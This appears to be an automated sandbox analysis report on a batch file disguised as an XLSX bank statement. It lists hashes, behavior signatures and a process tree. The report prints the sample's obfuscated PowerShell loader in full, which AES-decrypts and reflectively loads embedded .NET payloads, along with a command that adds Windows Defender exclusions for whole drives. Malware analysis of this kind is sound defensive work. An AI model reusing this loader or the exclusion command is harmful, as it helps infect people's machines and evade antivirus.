Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
23/01/2024, 15:33
Static task
static1
Behavioral task
behavioral1
Sample
56419_Ekstre_22012202.XLSX.bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
56419_Ekstre_22012202.XLSX.bat
Resource
win10v2004-20231222-en
General
-
Target
56419_Ekstre_22012202.XLSX.bat
-
Size
551KB
-
MD5
93ffa97cac3aee1759f1263417ba68c4
-
SHA1
f987f902cb03fd968640e30e5ce02aa3d686559b
-
SHA256
0318fe2580ee49d1d554d04861bf1993dcd36847baa7006b1dd6d6f3df6993e9
-
SHA512
33db2fc6d11757105824d3a33b626930baef58d002124a4cd8ad8e26fd5ee64fa760348abcadce1aca7fab9593c3e381627a49ae97541f54134e9f7a2c843207
-
SSDEEP
12288:YjfWxwAqoJ6gq9xDB2M4B5u2EJ52JWLCKszzUtakIjW0pibC4QMCiYRhfwvz7:A/Aqec9xDBfZXTLCVztpd45CtRhQz7
Malware Config
Signatures
-
Program crash 1 IoCs
pid pid_target Process procid_target 3516 1368 WerFault.exe 90 -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1368 powershell.exe 1368 powershell.exe 1088 powershell.exe 1088 powershell.exe 1400 powershell.exe 1400 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 1088 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 4840 wrote to memory of 1532 4840 cmd.exe 87 PID 4840 wrote to memory of 1532 4840 cmd.exe 87 PID 1532 wrote to memory of 4976 1532 cmd.exe 89 PID 1532 wrote to memory of 4976 1532 cmd.exe 89 PID 1532 wrote to memory of 1368 1532 cmd.exe 90 PID 1532 wrote to memory of 1368 1532 cmd.exe 90 PID 1532 wrote to memory of 1368 1532 cmd.exe 90 PID 1368 wrote to memory of 1088 1368 powershell.exe 93 PID 1368 wrote to memory of 1088 1368 powershell.exe 93 PID 1368 wrote to memory of 1088 1368 powershell.exe 93 PID 1368 wrote to memory of 1400 1368 powershell.exe 99 PID 1368 wrote to memory of 1400 1368 powershell.exe 99 PID 1368 wrote to memory of 1400 1368 powershell.exe 99
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\56419_Ekstre_22012202.XLSX.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\56419_Ekstre_22012202.XLSX.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\56419_Ekstre_22012202.XLSX.bat';$ZnXf='LosUlIadsUlI'.Replace('sUlI', ''),'CoYoykpyTYoykoYoyk'.Replace('Yoyk', ''),'InvKVvhokKVvheKVvh'.Replace('KVvh', ''),'ReaHzYUdLHzYUinHzYUesHzYU'.Replace('HzYU', ''),'GRhkEetRhkECuRhkErreRhkEntRhkEPRhkErocRhkEesRhkEsRhkE'.Replace('RhkE', ''),'DWyqDecWyqDoWyqDmpWyqDrWyqDesWyqDsWyqD'.Replace('WyqD', ''),'ChaaxiungaxiueaxiuExtaxiuensaxiuionaxiu'.Replace('axiu', ''),'FSUITroSUITmBaSUITseSUIT64SUITSSUITtrSUITingSUIT'.Replace('SUIT', ''),'ElIthAemeIthAnIthAtAIthAtIthA'.Replace('IthA', ''),'CuhKsruhKseuhKsateuhKsDeuhKscruhKsypuhKstuhKsoruhKs'.Replace('uhKs', ''),'SSGjzplSGjzitSGjz'.Replace('SGjz', ''),'EnylxutylxurylxuyPylxuoylxuiylxuntylxu'.Replace('ylxu', ''),'TUGbIraUGbInsUGbIfoUGbIrmUGbIFinUGbIalBUGbIloUGbIcUGbIkUGbI'.Replace('UGbI', ''),'MaiLJmhnMLJmhodLJmhuleLJmh'.Replace('LJmh', '');powershell -w hidden;function zVqiZ($ADZsr){$phgKT=[System.Security.Cryptography.Aes]::Create();$phgKT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$phgKT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$phgKT.Key=[System.Convert]::($ZnXf[7])('LLFztVl9QVwnRpd+WQrk03Mcs5Q/zcS7jOTtyEQLFsQ=');$phgKT.IV=[System.Convert]::($ZnXf[7])('8oDwRwNSJIxTBzexHnRKYg==');$bWWBv=$phgKT.($ZnXf[9])();$XGurB=$bWWBv.($ZnXf[12])($ADZsr,0,$ADZsr.Length);$bWWBv.Dispose();$phgKT.Dispose();$XGurB;}function SfJcX($ADZsr){$zxrJb=New-Object System.IO.MemoryStream(,$ADZsr);$mKrBy=New-Object System.IO.MemoryStream;$fRiUi=New-Object System.IO.Compression.GZipStream($zxrJb,[IO.Compression.CompressionMode]::($ZnXf[5]));$fRiUi.($ZnXf[1])($mKrBy);$fRiUi.Dispose();$zxrJb.Dispose();$mKrBy.Dispose();$mKrBy.ToArray();}$zWOlL=[System.IO.File]::($ZnXf[3])([Console]::Title);$dsCLJ=SfJcX (zVqiZ ([Convert]::($ZnXf[7])([System.Linq.Enumerable]::($ZnXf[8])($zWOlL, 5).Substring(2))));$jcGog=SfJcX (zVqiZ ([Convert]::($ZnXf[7])([System.Linq.Enumerable]::($ZnXf[8])($zWOlL, 6).Substring(2))));[System.Reflection.Assembly]::($ZnXf[0])([byte[]]$jcGog).($ZnXf[11]).($ZnXf[2])($null,$null);[System.Reflection.Assembly]::($ZnXf[0])([byte[]]$dsCLJ).($ZnXf[11]).($ZnXf[2])($null,$null); "3⤵PID:4976
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 26204⤵
- Program crash
PID:3516
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1368 -ip 13681⤵PID:3748
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5928d36ad618a369ffebf44885d07cf81
SHA1edf5a353a919c1873af8e6a0dfafa4c38c626975
SHA256d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea
SHA5124ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82